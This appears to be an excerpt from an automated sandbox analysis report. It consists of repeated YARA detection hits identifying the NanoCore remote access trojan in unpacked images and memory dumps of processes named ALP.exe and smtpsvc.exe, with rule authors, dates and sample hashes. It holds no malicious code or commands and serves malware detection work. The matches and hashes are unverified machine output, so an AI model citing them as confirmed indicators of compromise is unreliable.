        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.840000.9.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.244df88.20.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2300000.19.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORY, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
